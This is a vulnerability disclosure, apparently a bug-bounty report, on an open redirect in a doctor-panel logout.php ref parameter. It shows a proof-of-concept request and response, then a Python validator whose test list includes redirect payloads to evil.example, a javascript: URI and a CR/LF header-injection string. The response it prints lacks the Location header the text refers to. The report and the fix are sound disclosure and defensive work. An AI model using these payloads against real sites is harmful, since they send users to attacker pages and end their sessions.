There's an Open URL Redirect vulnerability in the logout functionality. If a malicious actor sends the crafted link to a logged-in doctor, the application will redirect the doctor to a malicious site.
Steps to Reproduce
- As a logged-in Doctor, click the securely sign out button.
- Notice that the logout endpoint takes a ref parameter.
- If you submit the following payload, the application will redirect the user to the URL supplied in the payload:
Request:

GET /drpanel/logout.php?ref=//https:\/\/www.google.com HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate

Response:

HTTP/1.1 302 Found
Date: Sun, 09 May 2021 16:44:09 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
As you can see, the Location header contains the google.com URL, which will take the user to that URL.
Since the application has no mechanism to verify that the logged-in user actually intended to log out, a Doctor who visits the URL supplied by the attacker is logged out and redirected to the malicious site.
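As an added illustration (not code from the report or from the application), the following validator shows how a logout endpoint can keep the ref parameter while refusing off-site targets, including the protocol-relative and backslash forms used in the payload above. The fallback path /login.php and the sample payloads are assumptions constructed for the example.

```python
"""Validate a post-logout redirect target (illustrative, not the app's code).

The logout endpoint on this page copies the ``ref`` parameter into the
Location header, so a value such as ``//https:\\/\\/www.google.com`` sends
the browser off-site. ``safe_redirect_target`` keeps only same-origin,
path-relative targets and falls back to a fixed default otherwise.
"""
from urllib.parse import urlsplit

# Constructed payloads for the self-check below; the first is the one shown
# in the report, the rest are common variants of the same idea.
REJECTED = [
    "//https:\\/\\/www.google.com",   # payload from the report
    "//evil.example",                 # protocol-relative URL
    "/\\evil.example",                # browsers treat '\' as '/' in http(s) URLs
    "///evil.example",                # WHATWG URL parsing skips the extra slashes
    "https://evil.example/",          # absolute URL on another host
    "javascript:alert(1)",            # non-http scheme
    "/ok\r\nX-Injected: 1",           # CR/LF would split the Location header
    "",                               # nothing to redirect to
]


def is_safe_redirect(ref: str) -> bool:
    """True only for a same-origin, path-relative target such as '/drpanel/'."""
    if not ref or any(ord(c) < 0x21 or ord(c) == 0x7F for c in ref):
        return False  # empty, or contains whitespace / control characters
    # Browsers normalise '\' to '/' before resolving; do the same before checking.
    normalised = ref.replace("\\", "/")
    if not normalised.startswith("/") or normalised.startswith("//"):
        return False  # not rooted, or protocol-relative ('//', '///', ...)
    parts = urlsplit(normalised)
    # Belt and braces: a single-slash path must carry neither scheme nor host.
    return parts.scheme == "" and parts.netloc == ""


def safe_redirect_target(ref: str, default: str = "/login.php") -> str:
    """Return ref if it is safe to put in a Location header, else the default.

    ``default`` is an assumed landing page, not a path taken from the report.
    """
    return ref if is_safe_redirect(ref) else default


if __name__ == "__main__":
    for bad in REJECTED:
        assert not is_safe_redirect(bad), bad
    assert is_safe_redirect("/drpanel/index.php?msg=out")
    print("all redirect checks behave as expected")
```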